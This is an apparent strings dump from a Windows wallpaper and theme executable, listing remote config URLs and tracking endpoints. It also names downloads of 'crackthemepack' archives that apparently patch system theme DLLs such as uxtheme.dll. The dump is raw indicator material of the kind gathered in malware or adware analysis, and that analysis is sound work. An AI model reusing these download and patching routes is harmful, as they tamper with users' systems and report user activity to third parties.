http://config.wallba.com/Public/Configs/KpStartupControl/%s.xml
http://config.wallba.com/Public/Configs/KpStartupControl/%s.xml
%system32%
%system32%
TempDownLoad\StartUp\tempfile\StartUp.xml
TempDownLoad\StartUp\tempfile\StartUp.xml
kptest.tmp
kptest.tmp
http://img.wallba.com/Public/caijiansuoluetu/2013nian/8yue/0808fj.jpg
http://img.wallba.com/Public/caijiansuoluetu/2013nian/8yue/0808fj.jpg
http://img.wallba.com/Public/caijiansuoluetu/2013nian/8yue/0809kt.jpg
http://img.wallba.com/Public/caijiansuoluetu/2013nian/8yue/0809kt.jpg
http://img.wallba.com/Public/caijiansuoluetu/2013nian/8yue/0808kt.jpg
http://img.wallba.com/Public/caijiansuoluetu/2013nian/8yue/0808kt.jpg
http://config.wallba.com/Public/Configs/KpInstall/AnImg.xml
http://config.wallba.com/Public/Configs/KpInstall/AnImg.xml
http://config.153624.com/Public/conf/open/1/%s_%s/10.jpg
http://config.153624.com/Public/conf/open/1/%s_%s/10.jpg
img.wallba.com
img.wallba.com
%d/xp/%d/%d/%d
%d/xp/%d/%d/%d
%d/win7/%d/%d/%d
%d/win7/%d/%d/%d
%d/%d/%d/%d/%d
%d/%d/%d/%d/%d
%d/0/%d/%d/%d
%d/0/%d/%d/%d
%s/%d.xml
%s/%d.xml
%d%d%d%d%d%d%d.xml
%d%d%d%d%d%d%d.xml
thumbnail.xml
thumbnail.xml
TempWallFile\TempThemWall.jpg
TempWallFile\TempThemWall.jpg
kpTailor.exe
kpTailor.exe
%dK/s
%dK/s
/Public/Configs/Album/%d
/Public/Configs/Album/%d
/%d.xml
/%d.xml
KpInstallTheme.exe type=
KpInstallTheme.exe type=
\Web\Wallpaper\Windows\img0.jpg
\Web\Wallpaper\Windows\img0.jpg
Web\Wallpaper\bliss.jpg
Web\Wallpaper\bliss.jpg
\NoticeDlgSkin.ini
\NoticeDlgSkin.ini
skinConfig\skinconfig.ini
skinConfig\skinconfig.ini
.jpeg
.jpeg
KpInstallTheme.exe
KpInstallTheme.exe
\SettingMenuDlgConfig\MainMenuDlgSkin.ini
\SettingMenuDlgConfig\MainMenuDlgSkin.ini
-iexplore.exe
-iexplore.exe
windows 3.1
windows 3.1
windows 95,
windows 95,
windows 98,
windows 98,
windows NT
windows NT
windows 2000
windows 2000
windows xp
windows xp
windows 2003
windows 2003
windows 2008
windows 2008
windows 7
windows 7
windows 8
windows 8
http://config.wallba.com/Public/Configs/themecrack/crackthemepackwin7x64.rar
http://config.wallba.com/Public/Configs/themecrack/crackthemepackwin7x64.rar
http://config.wallba.com/Public/Configs/themecrack/crackthemepackwin7.rar
http://config.wallba.com/Public/Configs/themecrack/crackthemepackwin7.rar
http://config.wallba.com/Public/Configs/themecrack/crackthemepackwinxp.rar
http://config.wallba.com/Public/Configs/themecrack/crackthemepackwinxp.rar
\themeui.dll
\themeui.dll
\UpdateUi\SkinCenter.ini
\UpdateUi\SkinCenter.ini
SkinSetting.xml
SkinSetting.xml
\UpdateNoticeDlg.ini
\UpdateNoticeDlg.ini
&key=
&key=
/stat.php?c=download&a=add
/stat.php?c=download&a=add
stat.wallba.com
stat.wallba.com
/stat/statUserAction.php
/stat/statUserAction.php
action.wallba.com
action.wallba.com
Windows 7
Windows 7
Windows Vista
Windows Vista
tongji.zhenlaji.com
tongji.zhenlaji.com
%s %d
%s %d
HTTP/1.0
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
.PAVCInternetException@@
.PAVCInternetException@@
Range: bytes=%d-%d
Range: bytes=%d-%d
Range: bytes=%d-
Range: bytes=%d-
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt; DTS Agent;)
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt; DTS Agent;)
Referer: %s
Referer: %s
http://www.wallba.com/
http://www.wallba.com/
Host: %s
Host: %s
GET %s HTTP/1.1
GET %s HTTP/1.1
%s_%d
%s_%d
/kp_api.php?s=favorite/addFavorite
/kp_api.php?s=favorite/addFavorite
down_url
down_url
type_%d
type_%d
IEOpenURL
IEOpenURL
SystemExeName
SystemExeName
KeyFilePath
KeyFilePath
KeyPath
KeyPath
0900936iso-ir-581028598iso_8859-81201255iso_8859-8-i1200932cswindows31j
0900936iso-ir-581028598iso_8859-81201255iso_8859-8-i1200932cswindows31j
0628597greek81201258windows-1258
0628597greek81201258windows-1258
1201257windows-12570738598logical
1201257windows-12570738598logical
1201256windows-12560651932euc-jp
1201256windows-12560651932euc-jp
1201255windows-1255
1201255windows-1255
2701143x-ebcdic-finlandsweden-euro1201254windows-1254
2701143x-ebcdic-finlandsweden-euro1201254windows-1254
0801251x-cp12511201253windows-12531400949ks_c_5601_19871528599iso_8859-9:1989
0801251x-cp12511201253windows-12531400949ks_c_5601_19871528599iso_8859-9:1989
0801250x-cp12501201252windows-1252
0801250x-cp12501201252windows-1252
1201251windows-12511528598iso_8859-8:1988
1201251windows-12511528598iso_8859-8:1988
1201250windows-12502301149x-ebcdic-icelandic-euro
1201250windows-12502301149x-ebcdic-icelandic-euro
1150220iso-2022-jp1100874windows-874
1150220iso-2022-jp1100874windows-874
1901145x-ebcdic-spain-euro1620127iso_646.irv:1991
1901145x-ebcdic-spain-euro1620127iso_646.irv:1991
0551932x-euc1250221_iso-2022-jp1000932csshiftjis
0551932x-euc1250221_iso-2022-jp1000932csshiftjis
http-equiv
http-equiv
<>=\/?!"';
<>=\/?!"';
(%d nulls removed)
(%d nulls removed)
length %d
length %d
to length %d
to length %d
to %d bytes
to %d bytes
from length %d
from length %d
from byte length %d
from byte length %d
%s("%s","%s","%s")
%s("%s","%s","%s")
CWebBrowser2
CWebBrowser2
WebBrowser Create Failed!
WebBrowser Create Failed!
www.baidu.com
www.baidu.com
%d %d
%d %d
btn%d_count
btn%d_count
btn%d_image
btn%d_image
btn%d_chage
btn%d_chage
%d %d %d %d
%d %d %d %d
%d %d %
%d %d %
progressShadow
progressShadow
colorkey
colorkey
isshow
isshow
layer_%d
layer_%d
x=%d,y=%d
x=%d,y=%d
ui/empty.png
ui/empty.png
_DeleteElem(): item=%d, elem=%d, type=%d, nType=%d
_DeleteElem(): item=%d, elem=%d, type=%d, nType=%d
CGuiTree::DeleteItem(): id=%d
CGuiTree::DeleteItem(): id=%d
\themeservice.dll
\themeservice.dll
\uxtheme.dll
\uxtheme.dll
Windows 7 Home
Windows 7 Home
Microsoft Windows Millennium Edition
Microsoft Windows Millennium Edition
Microsoft Windows 98
Microsoft Windows 98
Microsoft Windows 95
Microsoft Windows 95
%s (Build %d)
%s (Build %d)
Service Pack 6a (Build %d)
Service Pack 6a (Build %d)
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Hotfix\Q246009
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Hotfix\Q246009
%d.%d
%d.%d
Web Edition
Web Edition
Microsoft Windows NT
Microsoft Windows NT
Microsoft Windows 2000
Microsoft Windows 2000
Microsoft Windows XP
Microsoft Windows XP
Microsoft Windows Server 2003,
Microsoft Windows Server 2003,
Microsoft Windows XP Professional x64 Edition
Microsoft Windows XP Professional x64 Edition
Windows Server "Longhorn"
Windows Server "Longhorn"
1, 0, 0, 1
1, 0, 0, 1
kuping_v4.EXE
kuping_v4.EXE
kp4_Mini.exe_660:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
MFC42.DLL
MFC42.DLL
MSVCRT.dll
MSVCRT.dll
_acmdln
_acmdln
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
MSVCP60.dll
MSVCP60.dll
0900936iso-ir-581028598iso_8859-81201255iso_8859-8-i1200932cswindows31j
0900936iso-ir-581028598iso_8859-81201255iso_8859-8-i1200932cswindows31j
0628597greek81201258windows-1258
0628597greek81201258windows-1258
1201257windows-12570738598logical
1201257windows-12570738598logical
1201256windows-12560651932euc-jp
1201256windows-12560651932euc-jp
1201255windows-1255
1201255windows-1255
2701143x-ebcdic-finlandsweden-euro1201254windows-1254
2701143x-ebcdic-finlandsweden-euro1201254windows-1254
0801251x-cp12511201253windows-12531400949ks_c_5601_19871528599iso_8859-9:1989
0801251x-cp12511201253windows-12531400949ks_c_5601_19871528599iso_8859-9:1989
0801250x-cp12501201252windows-1252
0801250x-cp12501201252windows-1252
1201251windows-12511528598iso_8859-8:1988
1201251windows-12511528598iso_8859-8:1988
1201250windows-12502301149x-ebcdic-icelandic-euro
1201250windows-12502301149x-ebcdic-icelandic-euro
1150220iso-2022-jp1100874windows-874
1150220iso-2022-jp1100874windows-874
1901145x-ebcdic-spain-euro1620127iso_646.irv:1991
1901145x-ebcdic-spain-euro1620127iso_646.irv:1991
0551932x-euc1250221_iso-2022-jp1000932csshiftjis
0551932x-euc1250221_iso-2022-jp1000932csshiftjis
%s\%s
%s\%s
minikey
minikey
softset.ini
softset.ini
GetExeFlag
GetExeFlag
UniversalFunction.dll
UniversalFunction.dll
1.0.0.1
1.0.0.1
version.ini
version.ini
2013,1,1,1,1,1
2013,1,1,1,1,1
dddddd
dddddd
1987,1,1,1,1,1
1987,1,1,1,1,1
softProc
softProc
KP_5.exe
KP_5.exe
1, 0, 0, 1
1, 0, 0, 1
UniversalMini.EXE
UniversalMini.EXE